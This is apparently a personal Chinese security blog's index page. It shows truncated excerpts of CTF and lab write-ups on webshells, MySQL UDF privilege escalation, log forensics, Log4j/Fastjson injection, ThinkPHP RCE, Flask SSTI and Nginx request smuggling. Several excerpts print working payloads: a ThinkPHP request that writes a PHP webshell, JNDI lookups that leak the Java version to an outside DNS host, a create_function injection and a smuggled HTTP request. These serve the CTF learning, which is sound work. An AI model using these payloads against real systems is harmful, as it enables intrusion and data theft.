L的博客

不知道干点什么，干脆玩玩维权吧。web67012345678910111213141516<?phperror_reporting(0);highlight_file(__FILE__);$a=$_GET['action'];switch($a){ case 'cmd': eval($_POST['cmd']); break; case 'check': file_get_contents("http://checker/api/check"); break; default: die('params not validate');} 经过尝试后发现其在check后会删文件。 而想到对抗方法当然就是内存马了，于是我在网上随便找了一个内存马123456789101112<?php ignore_user_abort(true);//允许脚本再客户 ...

打玄机的时候遇到了mysql的日志审查，而我本人对于提权操作其实并不是特别了解。本文将记录mysql的udf提权的学习什么是udfudf的全称为User Defined Function，是mysql为了拓展自己的灵活性出的一个功能，其允许用户通过动态链接库来自定义function。 创建与使用1CREATE FUNCTION <function_name> RETURNS <return_type> SONAME '<library_name>'; 创建的function_name必须是我们so文件在编译前的c文件内声明过的。且so文件必须在plugin路径下我们可以通过如下路径来查询plugin路径1show variables like "%plugin%"; 调用1SELECT <function_name>(<parameters>);我们可以使用如下方法来自定义创建我们所需的so文件123456789101112131415161718#include <stdio.h ...

第二章日志分析-apache日志分析1、提交当天访问次数最多的IP，即黑客IP：apache的日志ip是在第一个我们直接分组输出第一个组就是ip让后在统计次数即可12cat access.log.1|awk '{print$1}'|sort -n|uniq -c flag{192.168.200.2} 2、黑客使用的浏览器指纹是什么，提交指纹的md5：直接过滤出黑客ip然后将ua头进行md5加密即可1cat access.log.1|grep "192.168.200.2" 3、查看index.php页面被访问的次数，提交次数：过滤/index.php1cat access.log.1|grep "/index.php"|awk '{print$1}'|sort -n|uniq -c 4、查看黑客IP访问了多少次，提交次数：l第一题就出了1cat access.log.1|awk '{print$1}'|sor ...

[HZNUCTF 2023 final]ezjava 打开靶机其告诉我们会将uri的值计入log,且fastjson的版本为1.2.48首先这个版本的fastjson是不存在我们所俗知的fastjson反序列化漏洞的,其只存在原生反序列化漏洞,而题目说会将内容计入log,着让人想到了log4j的漏洞从jndi注入到log4j注入先尝试以下payload1${jndi:dns://v73iwpad5ajfj3cacftbwptl7cd31vpk.oastify.com} 可以发现成功进行了dns请求者就证明了此处存在JNDI注入我们再探测以下java版本1${jndi:dns://${sys:java.version}.v73iwpad5ajfj3cacftbwptl7cd31vpk.oastify.com} 可以发现其版本为1.8.0.222这个版本的java是无法直接通过ldap来进行命令执行的而题目说其fastjson的版本为1.2.48.那么我们就可以使用ldap来触发fastjson原生反序列化从而命令 ...

其实很早就想学习java内存马的知识了。虽然现在对java安全的了解还很浅显，但是因为我个人对各种马比较有兴趣，所以这篇文章想浅显的认识一下内存马基础知识学内存马之前我们需要先了解的概念挺多的1.啥是servlet2.啥是tomcat，tomcat的结构逻辑又是啥。 我们先来谈一下servletservlet是javaweb中一个非常重要的组件，其可以获取客户端的请求与发生响应到客户端。 servlet的生命周期Servlet 初始化后调用 init () 方法。Servlet 调用 service() 方法来处理客户端的请求。Servlet 销毁前调用 destroy() 方法。最后，Servlet 是由 JVM 的垃圾回收器进行垃圾回收的。https://www.runoob.com/servlet/servlet-life-cycle.html DEMO先来简单写几个servlet的demo吧首先我们先来看一下jakarta EE自己生成的javaweb代码123456789101112131415161718192021222324252627package org.lse.j ...

今天不知道学点什么就氪金打了一下春秋云镜的靶场。只能说我对域的了解几乎为0。这篇文章记录一下域渗透的一些知识，和tp——cve的漏洞成因吧thinkphp5.23rce漏洞再路由随便传参数?s=asdwdwa就会发生报错，通过报错可以发现该think版本为5.23其漏洞payload如下123GET /?s=captcha_method=__construct&filter[]=system&method=get&server[REQUEST_METHOD]=echo 'PD9waHAgZXZhbCgkX1BPU1RbMV0pO3BocGluZm8oKTs/Pg==' |base64 -d > shell.php我们直接写马通过哥斯拉来连接 其权限为www-data。我们先进行常规提权。先尝试suid提权并没有发现可以利用的命令再尝试进行sudo提权可以发现我们能够无密码使用mysql我这里贴一个sudo提权的文章Linux提权之Sudo 70种提权方法（上）Linux提权之Sudo 70种提权方法（中）Linux提权之Sudo 7 ...

参考(学习文章)文章https://github.com/Bypass007/Emergency-Response-Notes 第一章 应急响应-webshell查杀1.黑客webshell里面的flag flag{xxxxx-xxxx-xxxx-xxxx-xxxx}用d盾扫可以扫出三个webshell从上到下分别是一句话木马，哥斯拉马和混淆一句话打开哥斯拉马可以找到flag 2.黑客使用的什么工具的shell github地址的md5 flag{md5}哥斯拉马https://github.com/Tas9er/ByPassBehinder 3.黑客隐藏shell的完整路径的md5 flag{md5} 注 : /xxx/xxx/xxx/xxx/xxx.xxx我们可以用如下命令来读取web命令下的所有隐藏文件1find /var/www/html/ -type f -name ".*"可以发现一个php文件读取后发现其为木马/var/www/html/include/Db/.Mysqli.php 4.黑客免杀马完整路径 md5 flag{md5}题目问的是免杀马 ...

本文首发于先知社区flask请求头回显的学习和探究如何进行错误页面污染回显 没想到这都能过，只能说踏着前人的路前前行了。写这篇文章的起因是我在无聊逛先知社区时发现了这两篇文章Jinja2-SSTI通过Server请求头带出命令回显Jinja2-SSTI 新回显方式技术学习看完这两篇文章我对文章内容进行了学习以及复现有了几个想法。 1.在我复现时发现了一个致命的问题，就是其响应的请求头内容因为要经过latin-1编码必须要为ascii码字符，即其一遇到中文字符便会报错(我个人经过思考觉得有如下解决方法，1.通过篡改报错页面的响应进行回显，2.通过编码来输出字符) 2.文章作者尝试对500回显时的内容进行污染但是其却失败了，作者污染的是responses下的500元组，但我查看了一下其值发现这于flask真正的500回显相差极大。那么那应该不是控制500回显的类。真正的类是什么呢?（我会在下面给出答案） 3.这个ssti的回显方法本质上是将回显的变量进行更改，即污染。那么这个能否在原型链污染中进行一下漏洞利用呢? 请求头首先我们要了解一些flask的请求和响应是利用了什么。flask的请求 ...

web海关警察训练平台查看其nginx版本为1.17.60搜索可以发现该版本可以发现该版本存在请求走私题目又说其flag在http://infernityhost/flag.html123456789101112GET / HTTP/1.1Host: gamebox.yunyansec.comContent-Length: 4Transfer-Encoding : chunked46GET /flag.html HTTP/1.1Host:infernityhostContent-Length:15kk0s（CVE-2020-12440）Nginx <= 1.8.0 请求走私 奶龙waf 首先需要绕过后缀检测，因为其将GET传值的name通过 $fileExtension = strtolower(pathinfo($name, PATHINFO_EXTENSION));来获取文件名后缀那么我们就可以使用/.来进行绕绕过看源码会发现waf拦的很死,但是我们只要使其检测的结果为false即可,那么这就可以想到使用正则回溯来绕过 可以看到其waf会匹配注释符之间的字符那么我只要在注 ...

这篇文章虽然叫利用FFI来绕过disable_functions其实还是想了解一下php的FFI，主要是在打单身杯时遇到了，java的Native方法来执行so文件即执行C语言代码，从而绕过Java Security Manager。二php的FFI也是php运行其他语言代码的一种方法[极客大挑战 2020]Roamphp5-FighterFightsInvincibly打开源码可以看到1$_REQUEST['fighter']($_REQUEST['fights'],$_REQUEST['invincibly']);我们可以尝试使用creat_function注入的方式来进行命令执行1fighter=create_function&fights=&invincibly=};phpinfo();/*我们查看其disable_functions可以发现其几乎将能命令执行的函数都禁了一遍试了一下可以拿蚁剑绕…但这都不是问题蚁剑的FFI竟然绕不过，我们就手动用FFI来绕我们既然要回显内容，那么我们就需要找到 ...